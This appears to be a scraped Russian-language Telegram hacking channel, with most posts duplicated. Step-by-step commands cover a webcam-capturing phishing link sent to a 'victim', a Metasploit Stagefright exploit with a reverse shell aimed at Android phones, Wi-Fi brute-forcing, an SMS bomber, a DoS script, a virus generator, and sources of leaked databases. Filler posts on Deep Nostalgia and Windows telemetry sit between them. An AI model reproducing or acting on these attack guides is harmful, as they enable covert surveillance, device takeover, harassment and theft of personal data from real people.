MyHeritage ( https://www.myheritage.com/deep-nostalgia/ ) — оживи свои фоточки с помощью умной нейронки
Вокруг генеалогического сайта MyHeritage огромный хайп последние дни. Там добавили новую фичу — Deep Nostalgia. Она использует технологии дипфейка, чтобы анимировать лица на любых фотографиях. В Твиттере сходят с ума: реанимируют умерших родственников, Николая II, старые мемы и все что видят.
Кто-то говорит, что выглядит крипово, а кто-то восхищается. Дипфейки и правда выглядят живее, чем на фото, но пока далеко до настоящего вау-эффекта. Но побаловаться точно стоит. Вверху пример той самой бабушки-мема — она «двигается» с помощью Deep Nostalgia.
Вокруг генеалогического сайта MyHeritage огромный хайп последние дни. Там добавили новую фичу — Deep Nostalgia. Она использует технологии дипфейка, чтобы анимировать лица на любых фотографиях. В Твиттере сходят с ума: реанимируют умерших родственников, Николая II, старые мемы и все что видят.
Кто-то говорит, что выглядит крипово, а кто-то восхищается. Дипфейки и правда выглядят живее, чем на фото, но пока далеко до настоящего вау-эффекта. Но побаловаться точно стоит. Вверху пример той самой бабушки-мема — она «двигается» с помощью Deep Nostalgia.
Взлом веб-камеры.
Всем привет сегодня, мы с вами поговорим о том как же можно взломать веб-камеру компьютера или телефона, с помощью термукс.
Grabcam - утилита, которая создаёт фишинг ссылку для уязвимости веб камер.
Установка :
▪️apt update -y
▪️apt upgrade -y
▪️pkg install python -y
▪️pkg install python2 -y
▪️pkg install wget -y
▪️pip install lolcat
▪️pkg install git -y
▪️git clone https://github.com/noob-hackers/grabcam
▪️cd grabcam
▪️chmod +x grabcam.sh
Запуск:
▪️bash grabcam.sh
После этого у вас появится выбор туннелирования, мы выбираем пункт 2 это ngrok. И кидаем ссылку жертве.
Чтобы посмотреть картинку :
▪️ls
▪️termux-open camназваниевашейкартинки.png
На этом все.
Всем привет сегодня, мы с вами поговорим о том как же можно взломать веб-камеру компьютера или телефона, с помощью термукс.
Grabcam - утилита, которая создаёт фишинг ссылку для уязвимости веб камер.
Установка :
▪️apt update -y
▪️apt upgrade -y
▪️pkg install python -y
▪️pkg install python2 -y
▪️pkg install wget -y
▪️pip install lolcat
▪️pkg install git -y
▪️git clone https://github.com/noob-hackers/grabcam
▪️cd grabcam
▪️chmod +x grabcam.sh
Запуск:
▪️bash grabcam.sh
После этого у вас появится выбор туннелирования, мы выбираем пункт 2 это ngrok. И кидаем ссылку жертве.
Чтобы посмотреть картинку :
▪️ls
▪️termux-open camназваниевашейкартинки.png
На этом все.
Обманываем провайдера / Имитация сёрфинга / Мутим алиби
Салам, бандиты. Надеюсь, все в курсе, что провайдеры хранят логи и видят посещения сайтов
Так вот, многие зададут вопрос "А зачём вообще нужно генерировать случайный трафик?". Суть в том, что данный скрипт поможет запутать провайдера (и тех, кто стоит над провайдером), генерируя случайный трафик с вашего IP и создавая видимость того, что вы реально сидите за компом.
Установка в Termux
💲apt instal python git -y
💲git clone https://github.com/1tayH/noisy.git
💲cd noisy
💲pip install -r requirements.txt
Linux (Kali, Debian, Ubuntu, Mint and etc):
💲git clone https://github.com/1tayH/noisy.git
💲cd noisy
💲pip install -r requirements.txt
Использование
💲python noisy.py -h — помощь, просмотр основных аргументов и параметров
💲python noisy.py --config config.json — запуск генерации трафика
Теперь скрипт начнёт заходить на случайный страницы, тем самым имитируя действия реального пользователя.
Скажи отделу К "не сегодня"✌️
Салам, бандиты. Надеюсь, все в курсе, что провайдеры хранят логи и видят посещения сайтов
Так вот, многие зададут вопрос "А зачём вообще нужно генерировать случайный трафик?". Суть в том, что данный скрипт поможет запутать провайдера (и тех, кто стоит над провайдером), генерируя случайный трафик с вашего IP и создавая видимость того, что вы реально сидите за компом.
Установка в Termux
💲apt instal python git -y
💲git clone https://github.com/1tayH/noisy.git
💲cd noisy
💲pip install -r requirements.txt
Linux (Kali, Debian, Ubuntu, Mint and etc):
💲git clone https://github.com/1tayH/noisy.git
💲cd noisy
💲pip install -r requirements.txt
Использование
💲python noisy.py -h — помощь, просмотр основных аргументов и параметров
💲python noisy.py --config config.json — запуск генерации трафика
Теперь скрипт начнёт заходить на случайный страницы, тем самым имитируя действия реального пользователя.
Скажи отделу К "не сегодня"✌️
Получаем доступ к телефону
В данном посте мы поговорим о том, как при помощи одной ссылки получить контроль над чужим телефоном.
Поможет нам в этом специальная утилита Metasploit, которая прекрасно справляется с уязвимостями Android старых версий.
Приступим:
1. Первым делом устанавливаем нашу утилиту в Termux:
apt update
apt upgrade
pkg install unstable-repo
pkg install metasploit
2. После этого запускаем утилиту:
msfconsole
3. Теперь, если Stagefright нет в Metasploit, то скачиваем его и перекидываем в папку с эксплоитами.
4. После этого прописываем:
msfconsole — открытие консоли
use exploit/android/browser/stagefrightmp4tx3g64bit — подключение эксплоита
set SRVHOST вашIP
set URIPATH /
set PAYLOAD linux/armle/mettle/reversetcp
set LHOST вашIP
set VERBOSE true
exploit -j — запуск эксплоита
Для нас сгенерируется специальная ссылка. Заворачиваем её в ngrok, по желанию маскируем и отправляем жертве под любым предлогом. Когда жертва по ней перейдёт, мы получим удалённый доступ к устройству.
В данном посте мы поговорим о том, как при помощи одной ссылки получить контроль над чужим телефоном.
Поможет нам в этом специальная утилита Metasploit, которая прекрасно справляется с уязвимостями Android старых версий.
Приступим:
1. Первым делом устанавливаем нашу утилиту в Termux:
apt update
apt upgrade
pkg install unstable-repo
pkg install metasploit
2. После этого запускаем утилиту:
msfconsole
3. Теперь, если Stagefright нет в Metasploit, то скачиваем его и перекидываем в папку с эксплоитами.
4. После этого прописываем:
msfconsole — открытие консоли
use exploit/android/browser/stagefrightmp4tx3g64bit — подключение эксплоита
set SRVHOST вашIP
set URIPATH /
set PAYLOAD linux/armle/mettle/reversetcp
set LHOST вашIP
set VERBOSE true
exploit -j — запуск эксплоита
Для нас сгенерируется специальная ссылка. Заворачиваем её в ngrok, по желанию маскируем и отправляем жертве под любым предлогом. Когда жертва по ней перейдёт, мы получим удалённый доступ к устройству.
Взламываем Wi-Fi с wi-toolkit
WI-TOOLKIT (https://github.com/mkdirlove/WI-TOOLKIT ) - утилита позволяющая провести брутфорс атаку на выбранную сеть Wi-Fi. Так же данная утилита позволяет начать WPS, WPA/WPA2 атаку, но для этого понадобится подключение к интернету.
Установка
$ git clone https://github.com/mkdirlove/WI-TOOLKIT
$ cd WI-TOOLKIT
$ chmod +x
$ ./install.sh
Использование
$ sudo python wi-toolkit.py
Более подробно об использовании данной утилиты можно почитать на официальной странице на GitHub (https://github.com/mkdirlove/WI-TOOLKIT).
WI-TOOLKIT (https://github.com/mkdirlove/WI-TOOLKIT ) - утилита позволяющая провести брутфорс атаку на выбранную сеть Wi-Fi. Так же данная утилита позволяет начать WPS, WPA/WPA2 атаку, но для этого понадобится подключение к интернету.
Установка
$ git clone https://github.com/mkdirlove/WI-TOOLKIT
$ cd WI-TOOLKIT
$ chmod +x
$ ./install.sh
Использование
$ sudo python wi-toolkit.py
Более подробно об использовании данной утилиты можно почитать на официальной странице на GitHub (https://github.com/mkdirlove/WI-TOOLKIT).
Самый функциональный sms-бомбер на Windows и Linux
BOMBERTHON - интересная реализация SMS бомбера, работающего посредством браузера, в который внедрен спам в Whatsapp и Instagram. Так же утилита позволяет настроить кол-во отправляемых сообщений от 1 до 200, кроме того бомбер совместим не только с Windows, но и с Linux.
Установка на Linux
$ git clone https://github.com/b31ngD3v/bomberthon
$ cd bomberthon
$ pip3 install -r requirements.txt
$ sudo chmod +x geckodriver
Использование
$ python3 bomberthon.py
BOMBERTHON - интересная реализация SMS бомбера, работающего посредством браузера, в который внедрен спам в Whatsapp и Instagram. Так же утилита позволяет настроить кол-во отправляемых сообщений от 1 до 200, кроме того бомбер совместим не только с Windows, но и с Linux.
Установка на Linux
$ git clone https://github.com/b31ngD3v/bomberthon
$ cd bomberthon
$ pip3 install -r requirements.txt
$ sudo chmod +x geckodriver
Использование
$ python3 bomberthon.py
Устраиваем DDoS атаку на Wi-Fi с телефона
DDoS — хакерская атака на вычислительную систему с целью довести её до отказа, то есть создание таких условий, при которых пользователи системы не смогут получить доступ к предоставляемым системным ресурсам (серверам), либо этот доступ будет затруднён.
Для начала надо скачать в Play Market такое приложение как Termux. Далее поледовательно прописываем команды в консоль:
upgrade
pkg install python python2 git
git clone https://github.com/artem-cell/wifi-dosser
cd wifi-dosser
pip2 install requests mechanize
python2 wifi-ddoser.py
Использование:
wifi-ddoser.py example.com 80 3 999999999999
80 и 3 - это стандартные порты
999999999999 - это время атаки в секундах
DDoS — хакерская атака на вычислительную систему с целью довести её до отказа, то есть создание таких условий, при которых пользователи системы не смогут получить доступ к предоставляемым системным ресурсам (серверам), либо этот доступ будет затруднён.
Для начала надо скачать в Play Market такое приложение как Termux. Далее поледовательно прописываем команды в консоль:
upgrade
pkg install python python2 git
git clone https://github.com/artem-cell/wifi-dosser
cd wifi-dosser
pip2 install requests mechanize
python2 wifi-ddoser.py
Использование:
wifi-ddoser.py example.com 80 3 999999999999
80 и 3 - это стандартные порты
999999999999 - это время атаки в секундах
Подборка сайтов для поиска баз данных
• databases.today — слитые базы, из них есть большие, ссылка на архивированную версию сайта;
• raidforums.com — ссылки на скачивание разных баз с 1995 года;
• ebaza.pro — Бесплатные базы с email, телефонами предприятий и физ. лиц.;
• phreaker.pro — большое разнообразие баз, начиная от номеров домофонов до данных банков;
• xss.is — список баз, 3,5B записей, 52 базы;
• hub.opengovdata.ru — каталог и хранилище открытых данных России;
• databases.today — слитые базы, из них есть большие, ссылка на архивированную версию сайта;
• raidforums.com — ссылки на скачивание разных баз с 1995 года;
• ebaza.pro — Бесплатные базы с email, телефонами предприятий и физ. лиц.;
• phreaker.pro — большое разнообразие баз, начиная от номеров домофонов до данных банков;
• xss.is — список баз, 3,5B записей, 52 базы;
• hub.opengovdata.ru — каталог и хранилище открытых данных России;
Все что нужно знать о Windows 10
1. Синхронизация данных с серверами Microsoft по умолчанию включена, в том числе:
• История посещений браузера и открытые страницы
• Настройки приложений
• Название сетей WiFi и сохраненные пароли
2. Для каждого пользователя по умолчанию генерируется уникальный "идентификатор получателя рекламы":
• Используется разработчиками приложений и рекламными сетями, чтобы предлагать более актуальную рекламу в приложениях
3. Кортана собирает обширный набор данных, в том числе:
• Нажатые клавиши, поисковые запросы и записи с микрофона
• Текущее местоположение
• Данные календаря
• Твою любимую музыку
• Данные о кредитных картах
• Покупки
4. Кроме того, Microsoft отдельно собирает и другие данные, такие как:
• Сохраненные пароли
• Демографические данные
• Привычки и интересы
• Статистику использования
• Данные о контактах
• Данные о местоположении
• Контентные данные (почта, сообщения, история звонков, аудио- и видеозаписи)
5. Данные могут быть переданы третьим лицам:
• При установке Windows 10, ты соглашаешься с тем, что Microsoft может передавать вышеуказанные данные любым третьим лицам, с или без твоего согласия.
1. Синхронизация данных с серверами Microsoft по умолчанию включена, в том числе:
• История посещений браузера и открытые страницы
• Настройки приложений
• Название сетей WiFi и сохраненные пароли
2. Для каждого пользователя по умолчанию генерируется уникальный "идентификатор получателя рекламы":
• Используется разработчиками приложений и рекламными сетями, чтобы предлагать более актуальную рекламу в приложениях
3. Кортана собирает обширный набор данных, в том числе:
• Нажатые клавиши, поисковые запросы и записи с микрофона
• Текущее местоположение
• Данные календаря
• Твою любимую музыку
• Данные о кредитных картах
• Покупки
4. Кроме того, Microsoft отдельно собирает и другие данные, такие как:
• Сохраненные пароли
• Демографические данные
• Привычки и интересы
• Статистику использования
• Данные о контактах
• Данные о местоположении
• Контентные данные (почта, сообщения, история звонков, аудио- и видеозаписи)
5. Данные могут быть переданы третьим лицам:
• При установке Windows 10, ты соглашаешься с тем, что Microsoft может передавать вышеуказанные данные любым третьим лицам, с или без твоего согласия.
Как узнать, на каких сайтах была задействована чья-то почта?
Доброго времени суток ! Сегодня мы покажем вам, как можно узнать на каких сайтах зарегистрирована любая электронная почта. Для наших целей подойдет отличный сервис LAMPURE https://lampyre.io/pricing
Сервис представляет собой инструмент для получения сводки по электронному адресу почты. При выводе сводки вы увидите и акки, такие как например: Facebook, Skype, PayPal, а также множество других. Предоставлена будет даже информация о модели смартфона и дате регистрации пользователя. Также, можно получить информацию о номере телефона, Caller ID (ФИО) и все связанные акки Facebook.
Чтобы начать использовать данный сервис, вам нужно зарегаться на нем. но учтите, что бесплатных проверок у вас будет всего 2, поэтому, можно просто понасоздавать левых акков при наличии потребности в более двух проверках.
Доброго времени суток ! Сегодня мы покажем вам, как можно узнать на каких сайтах зарегистрирована любая электронная почта. Для наших целей подойдет отличный сервис LAMPURE https://lampyre.io/pricing
Сервис представляет собой инструмент для получения сводки по электронному адресу почты. При выводе сводки вы увидите и акки, такие как например: Facebook, Skype, PayPal, а также множество других. Предоставлена будет даже информация о модели смартфона и дате регистрации пользователя. Также, можно получить информацию о номере телефона, Caller ID (ФИО) и все связанные акки Facebook.
Чтобы начать использовать данный сервис, вам нужно зарегаться на нем. но учтите, что бесплатных проверок у вас будет всего 2, поэтому, можно просто понасоздавать левых акков при наличии потребности в более двух проверках.
https://telegra.ph/Lazarus-atakuet-oboronnuyu-promyshlennost-s-pomoshchyu-ThreatNeedle-CHast-1-03-25
Telegraph
Lazarus атакует оборонную промышленность с помощью ThreatNeedle. Часть 1
Lazarus можно назвать самой активной APT-группировкой 2020 года. В течение года мы наблюдали многочисленные атаки этой преступной группировки на компании из различных отраслей экономики. Группа по исследованию угроз Google (Google TAG) недавно опубликовала…
https://telegra.ph/Lazarus-atakuet-oboronnuyu-promyshlennost-s-pomoshchyu-ThreatNeedle-CHast-2-03-25
Telegraph
Lazarus атакует оборонную промышленность с помощью ThreatNeedle. Часть 2
После получения учетных данных злоумышленники начали расширять свое присутствие в сети как на рабочих станциях, так и на серверах. Они применяли стандартные методы получения доступа к новым компьютерам с использованием утилит Windows. Вначале с помощью команды…
vbug - инструмент для быстрого создания вирусов, имеющий возможность выбрать между тремя типами вирусов: Anvima - для Android, WinVima - для Windows и MACvima - для MACOS.
Установка
$ apt-get update && apt-get upgrade
$ git clone https://github.com/Gameye98/vbug
Использование
$ python vbug.py
Более подробно об использовании утилиты можно почитать на GitHub репозитория.
Установка
$ apt-get update && apt-get upgrade
$ git clone https://github.com/Gameye98/vbug
Использование
$ python vbug.py
Более подробно об использовании утилиты можно почитать на GitHub репозитория.
⚡1